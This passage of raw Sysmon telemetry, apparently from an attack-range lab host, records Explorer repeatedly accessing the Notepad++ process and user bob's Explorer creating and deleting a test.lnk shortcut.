10341000x80000000000000001047102Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047101Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047100Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047099Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047098Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047097Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.148{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047096Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047095Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047094Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047093Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047092Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047091Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047090Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001047084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnk2021-07-12 07:44:24.124 10341000x80000000000000001047083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}6356ATTACKRANGE\bobC:\Windows\Explorer.EXEC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\test.lnkMD5=426FCF24E244603549F387735AB7C1DD,SHA256=30719EDC1D4DDCD1799555569965D8730BE0CEB5C8C9AA004BBD76FC6660DA47,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x80000000000000001047080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047076Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+56f96|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047075Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+5704f|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047074Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 
Files\Notepad++\notepad++.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+56fba|C:\Windows\System32\SHELL32.dll+58948|C:\Windows\System32\SHELL32.dll+555b5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+593aa|C:\Windows\System32\SHELL32.dll+cf36a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047073Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:36.132{466BC892-32D3-60E8-770B-00000000CF01}63564632C:\Windows\Explorer.EXE{466BC892-35E4-60E8-4B0C-00000000CF01}7336C:\Program 